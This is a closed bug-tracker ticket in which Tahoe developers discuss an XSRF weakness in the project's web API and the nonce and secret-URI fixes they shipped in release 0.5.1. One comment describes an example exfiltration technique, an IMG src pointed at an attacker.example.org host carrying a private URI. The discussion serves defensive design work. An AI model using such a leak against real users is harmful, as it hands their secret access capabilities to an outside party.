#98 closed defect (fixed)

Web API is vulnerable to XSRF attacks.

Reported by: nejucomo
Owned by: zooko
Priority: major
Milestone: 0.5.1
Component: code-frontend-web
Version: 0.4.0
Keywords: security
Cc:
Launchpad Bug:

Description

The current web API is susceptible to cross-site request forgery (XSRF) attacks [1].

An example attack scenario looks like this: the attacker expects the victim to be a Tahoe user, wants to read their hard drive, and knows they have a fetish for nuclear warhead HOWTO / porn mashups.

So they create NudieNukeHOWTOS.com and post an enticing link whose URL target PUTs the user's root directory to Tahoe.

Preventing this kind of attack requires (I believe) that users not be able to cut-and-paste URLs into their browser to initiate Tahoe actions. This might explicitly be counter to the design goals. A workaround is to require users to cut-and-paste into an entry form within the web UI (see below).

One technical solution is for the Web UI and API to associate an unguessable string with each action-triggering URL. These strings are provided to the browser (such as with a hidden input field) or the webapi client (perhaps in a header) and verified before executing actions.

If we want the use case of Alice sending Bob an email that says: "Hey download my great Tahoe photo directory with this URI: ...", we can require Bob to paste this string into an input field in the Web UI *instead* of the location bar. (Even this might be vulnerable... I'm not sure of the capabilities of javascript and the like...)

References: [1] http://en.wikipedia.org/wiki/XSRF

Change History (23)

comment:1 Changed at 2007-08-10T23:09:49Z by warner

Hm. I believe that browsers can't do PUT or DELETE (only GET and POST), so this might be a good argument for not having the localfile= argument on those methods (certainly on GET, since anyone can make you do a GET, but that's why GET is never supposed to have side effects anyway).

So if GETs are side-effect free, and the javascript same-origin policy prevents other sites' javascript from reading your local data, and browsers can't do PUT or DELETE, then I think the only attack vectors left are POSTs.

That would mean the attack is my web page containing a form whose action points at your local tahoe node and does something (like use localfile= to upload files from your disk into the vdrive somewhere I can read them, or perhaps just cause your node to delete your root directory). This strikes me as a more general problem: pretty much every large web site out there has actions that are triggered by form POSTs. How do they protect against other sites pointing forms their way? Do browsers complain if the form you serve doesn't point back at your own site? How do others deal with this?

Ohh.. but at the moment, the localfile= form of GET *does* have side-effects, namely writing to your local disk. So an attacker could easily cause you to modify your local filesystem. I had thought I'd put in some weak protection against the most obvious exploits of this (refuse to overwrite existing files), but in looking through the code, it seems that I'm remembering incorrectly.

So at the very least, we need to remove the localfile= form of GET.

comment:2 Changed at 2007-08-11T01:56:54Z by warner

I've disabled the localfile= form of GET and PUT in 42f8e574169b87a7; you must touch a special file named webport_allow_localfile in the node's basedir to re-enable them. (They're awfully useful for testing, so I didn't want to get rid of the feature completely.)

So that takes care of any localfile= issues. What's left?

comment:3 Changed at 2007-08-13T17:09:46Z by zooko

  • Milestone changed from undecided to 0.5.0
  • Owner changed from somebody to nejucomo

I'd like for somebody to review this issue before we release v0.5. Assigning it to Nejucomo.

comment:4 Changed at 2007-08-13T17:10:13Z by zooko

  • Priority changed from minor to major

comment:5 Changed at 2007-08-14T18:54:07Z by warner

  • Component changed from code to code-frontend-web

comment:6 Changed at 2007-08-15T15:47:14Z by zooko

I think Brian is right that this is a very general problem in web sites/web services. For example, if you visit this web page while you are logged into your amazon account, it will add a book to your amazon shopping cart:

http://shiflett.org/amazon.php

The capabilities perspective on XSRF attacks is that they are Confused Deputy Attacks. That is: your client (the web browser) is asking the server (the tahoe node or the amazon web server) to do X, and the web browser has the authority to do X, but the web browser shouldn't have used that authority at that time.

This happens because the authority is "ambient" within the scope of a "session" or a cookie or some other such authorization scope -- whatever requests are made within that scope are made with all of the client's authority.

For example, when amazon receives a request from your web browser to add a book to your shopping cart, it decides whether to honor the request based on whether your web browser is currently "logged in" to amazon. When a tahoe node receives a POST from your web browser to alter your vdrive, the tahoe node decides whether to honor the request based on whether the browser has authenticated (I guess -- I don't understand how or if we currently do authentication). The problem is that the browser is not used *solely* for that one purpose (amazon shopping or tahoe usage), so if the other purposes for which it is used lead to the user clicking on a link that was influenced by an attacker, this kind of attack can succeed.

A capabilities-inspired solution to this problem would be to make a narrower authorization. For example, below I elaborate on nejucomo's "unguessable string" suggestion:

When the tahoe node starts up, it emits a URL containing an unguessable random string into a file in its dir. The user has to cut and paste that URL into her web browser in order to use the tahoe node. For the duration of this run of the node process, it requires that same unguessable random string to be present in all HTTP requests that it receives. With this scheme, even if the user uses their web browser for other purposes at the same time as they use it for tahoe, and even if a malicious person gives them a hyperlink designed to abuse their tahoe authorities, or serves them a web page containing javascript like the "amazon.php" attack referenced above, the malicious person can't cause them to use their tahoe authorities, since the malicious person doesn't know the unguessable string.

Is that right so far?

I believe nejucomo has recently studied this topic and he may have a better idea.

comment:7 Changed at 2007-08-15T15:48:12Z by zooko

I'm starting to have confidence that the webapi that we have now is good enough/safe enough for v0.5. I still would like for nejucomo to look at it for a few minutes just to see if there is something that could be a serious issue in the short term.

comment:8 Changed at 2007-08-15T17:21:32Z by warner

I like the nonce idea. Several people have pointed out that URLs are leaky (referrer headers, anti-phishing toolbars, etc), but I think having the authority embedded in the URL is a lot better than having it be ambient in the browser.

If the nonce is stable over time, then users can bookmark their favorite sites. If not (if each session generates a new one, say), and we want to do password-based authentication on the local system (or maybe even a remote system, although URLs get a lot leakier when you tell someone else about them), then we could arrange for an old nonce to ask for authentication in some non-ambient-authority-creating way and then bounce you to the new nonce: i.e. http://LOCALHOST/NONCE1/path sends you to http://LOCALHOST/login?path_when_done=path, which asks for a password and then sends you to http://LOCALHOST/NONCE2/path .

The nonce in this scenario represents authority to access the user's entire vdrive: that is a good thing and a bad thing. The good thing is that it means the user can navigate to parent directories and generally get random-access to their whole vdrive. The bad thing is that they can't safely share web access to a limited portion of the vdrive (but that's what the "here's the URI you should share with someone else" link is for).

How about this for a post-0.5.0 release?

  • we create a persistent nonce the first time the webapi port is used
  • write that to disk in a human-readable format in a well-known file
  • change the welcome page to replace "click here to visit your vdrive" links with a small form
    • the form tells you the full pathname to the nonce file, and tells you to paste the nonce into this box
    • the form has one button for "visit my personal vdrive" and a second for "visit the global vdrive".
    • the code behind the form just redirects you to a URL that has the nonce added as a prefix
  • we also change the directory.xhtml page to make the "go back to the Welcome Page" link go up one more level, to get over the nonce part of the URL

This would deny local vdrive access to the providers of remote pages (those who do not know the nonce), but still leave an affordance for a local user to hit a simple (non-random) web page and receive instructions on how to access their vdrive. I think it makes access to the vdrive equivalent to access to the node's basedir, which is exactly the correspondence we want.

comment:9 Changed at 2007-08-15T18:33:27Z by warner

  • Milestone changed from 0.5.0 to 0.6.0

comment:10 Changed at 2007-08-16T18:38:55Z by warner

robk mentioned a technique they used back at Yahoo involving "crumbs", and has promised to add a note here with some details.

comment:11 Changed at 2007-08-20T19:45:51Z by nejucomo

I don't see the need for the complicated bootstrapping procedure when using noncey URLs. We may be able to preserve some user-friendliness while preventing XSRF attacks.

For instance, if the user is authenticated with a persistent cookie, we could provide the main top-level page without requiring a nonce. This would be safe as long as loading this page causes no Tahoe operations to be performed. This page would insert the nonce into each link it exposes.

Thus, an XSRF attack could only direct a user to the main page, but could not perform actions. The benefit here is that the user can bookmark the main page, or type it in, or follow a link on an instructional page.

comment:12 Changed at 2007-08-20T20:56:27Z by zooko

See related issue in ticket #52.

comment:13 Changed at 2007-08-21T22:09:34Z by zooko

  • Owner changed from nejucomo to zooko
  • Status changed from new to assigned

As per this discussion:

http://allmydata.org/pipermail/tahoe-dev/2007-August/000108.html

I intend to fix this ASAP and build a v0.5.1 release.

comment:14 Changed at 2007-08-21T23:13:05Z by zooko

Brian and I discussed nejucomo's simplification on IRC and we don't get it: couldn't javascript-enabled attackers fetch the welcome page, parse it, and then attack the user's data?

Oh, but non-javascript-enabled attackers couldn't.

Am I right?

comment:15 Changed at 2007-08-22T19:46:12Z by nejucomo

I'm not aware of a means for Javascript from host Malicious.com to fetch a page from TargetSite.com, parse it, and respond to it. But I certainly wouldn't be surprised if that were possible. (My knowledge of Javascript and web front-end technologies is limited, but growing because of this issue.)

In the example attack, the only purpose of the Javascript is to conceal a POST. The same attack is possible without Javascript; the main difference is that the user must be tricked into clicking a "submit" button. (Who knows, perhaps with CSS or some such, the POST could be concealed without Javascript.) It's important not to be confused about Javascript's role here. It does not "cause" any web requests; it just decorates a normal request to make the nature of the attack more obscure.

Is it possible for an XSRF attack to send a GET request to Tahoe, then redirect from that page to a second attack site which somehow snarfs private Tahoe data? (For example, if the main page is unprotected with a nonce, but has links to protected pages, is it possible to cause the browser to load that page and reveal the secrets to the attacker?)

I don't *think* this is possible, which leads me to suggest we follow this principle:

XSRF Defence Principle: Any URL which initiates a Tahoe action, or any Tahoe page which causes browser actions without user interaction, must be protected with a shared secret. Any *other* Tahoe URL may be bare and unprotected by a secret (for user-friendliness).

So, for instance, an unguarded URL should not accept any parameters whatsoever, but may have constrained side-effects (such as generating a new random nonce).

comment:16 Changed at 2007-08-22T20:10:34Z by nejucomo

So the most secure and least user-friendly solution I can imagine is this:

S1. There is one unguarded URL which serves up an authentication page (with a CAPTCHA for good measure).

S2. Whenever *any* page loads, it generates a unique nonce for *every* Tahoe URL contained in that page.

S3. Tahoe maintains a table of noncey URLs and related actions. Each entry is removed after a single use, or after a given timeout. (This mitigates URL leakiness.)

This has several drawbacks: no bookmarks, no human modification of the location bar, and lots of repeated authentications.

It sounds like the suggested deviations from this most-secure approach address different drawbacks with trade-offs:

  1. Use a single persistent nonce that is refreshed under certain (which?) conditions. This allows bookmarking and user modification of the location bar.
  2. Use no authentication whatsoever on the "authentication page" (making it a simple portal). This removes the need for frequent authentication, but may be vulnerable to XSRF.
  3. Make all inter-Tahoe UI actions and traversals into POSTs where the nonce is a hidden parameter. This is a user-friendliness feature. (This makes the URLs appear succinct and human-readable, and the user or another site may link to a specific action. If the nonce is missing, they are redirected to a login page explaining which action is about to be performed.)

Are there other deviations from the "most secure" approach, or complete alternatives we should consider?

comment:17 Changed at 2007-08-23T00:24:06Z by warner

After chatting with zooko about secrets, I've implemented the following change:

  • remove /vdrive/private from the web API
  • create a "start.html" file in BASEDIR at node startup, containing a brief welcome message and links to the following:
    • the welcome page (just a simple http://localhost:8080/ link)
    • the public vdrive (/vdrive/global)
    • the URI-based private vdrive root (/uri/$PRIVATE_URI)

This accomplishes the basic goal: making access to the private vdrive contingent upon knowing something secret. An attacker who gets control of the browser via any http-sourced page will be unable to learn $PRIVATE_URI, so they won't be able to access or modify anything through it. XSRF attacks against /vdrive/global are still possible, but the attacker could just as easily modify the public vdrive through their own node: they gain no additional abilities by using the victim's node.

The concern with javascript is an XSS thing: the assumption is that a page served by a "trusted" server will contain content under the control of the attacker, specifically a piece of javascript that runs in the context of the "trusted" page. This JS is then able to make HTTP requests (via the usual XMLHttpRequest mechanism used for AJAXy stuff) to anything on the same server, and those requests will be accompanied by any host-specific authority-bearing cookies.

Plain HTML is a concern as well, as nejucomo's example shows, when the POST or GET has side-effects. Plain HTML has no way to take the information it has learned and share it with others, whereas an active attack (javascript) does.

In our case, the XSS attack to be concerned about is one against the authority contained in the URL, specifically that /uri/$PRIVATE_URI portion. If an attacker can convince you to attach an .html file to your private vdrive somewhere and then view it, any javascript in that file gets control. It can read the current URL, extract the $PRIVATE_URI portion, then reveal that data to an external server (say, by changing the src= on an embedded IMG tag to refer to http://attacker.example.org/0wned.jpg?secret=$PRIVATE_URI).

To mitigate this problem, the next change I'm about to make is to modify the way we present certain files in the web directory view, to remove the authority from the URL. In each directory, we present a list of child names as hyperlinks, either to another directory or to the file attached to that name. With this change, the hyperlinks for files will point at /uri/$FILE_URI?t=$FILENAME instead of at .../$FILENAME. The effect is that the javascript etc. will still run, but there will be nothing interesting or secret left in the URL for it to usefully reveal.

This addresses another problem: URL leakage through Referer headers. If the user follows any hyperlink present on a /uri/$PRIVATE_URI page, that request will carry the page's URL in the Referer header, revealing the secret to the new web server. By ensuring that all HTML content renders in a different page (with no authority in the URL), this problem is fixed.

I'm planning to leave the .../file.html URL working (so that simple 'wget' operations like /uri/$PRIVATE_URI/subdir/foo.html still work and don't mangle the downloaded filename). This change will only cause the directory node navigation page to provide alternative HREFs for children which are files.

comment:18 Changed at 2007-08-23T00:41:43Z by warner

I've just pushed the second change I mentioned earlier, to present /uri-based URLs for all files in the vdrive.

It could use some improvement, though; in particular, I'm displeased that the URL you can cut-and-paste out of the HTML page ends in a big ugly hex string, so that when you pass it to 'wget', you get a file on disk with a useless big name.

I think I want to implement a URL which contains the tahoe file URI as the second-to-last component, but then contains the desired filename as the last component, like http://localhost:8080/uri/$URI/foo.jpg. The server would deliver the same file no matter what name you tack on the end, but this way tools like wget could use a sensible name instead of $URI.

Our present webapi doesn't accommodate this, though, since the /uri/$URI/ form can refer to directories too, in which case /uri/$URI/foo.jpg really means to look inside the directory referenced by $URI for a child named foo.jpg and serve that. So we need a new URL space: maybe /download, /download-uri, /uri-file, or something.

comment:19 Changed at 2007-08-23T00:42:38Z by warner

  • Milestone changed from 0.6.0 to 0.5.1

comment:20 Changed at 2007-08-30T23:33:33Z by warner

We released 0.5.1 a week ago. Are we happy enough with the fixes therein to close this ticket? I'd like to mark the trac 0.5.1 milestone as done, but this is the last ticket remaining.

comment:21 Changed at 2007-09-23T14:17:09Z by zooko

  • Resolution set to fixed
  • Status changed from assigned to closed

Whoops, I forgot to mark this as fixed in the v0.5.1 release.

I wish trac would send me e-mail. I suspect that my habit of "checking the Timeline for new stuff" isn't good enough to notice all the trac events that I want to notice.

comment:22 Changed at 2009-10-28T03:51:46Z by davidsarah

Note that JavaScript in a given file can still obtain the read URI for that file. In the case of a mutable file, this is more than least authority because it allows reading future versions. I will open a new bug about that.

comment:23 Changed at 2009-10-28T04:04:29Z by davidsarah

New bug is #821.
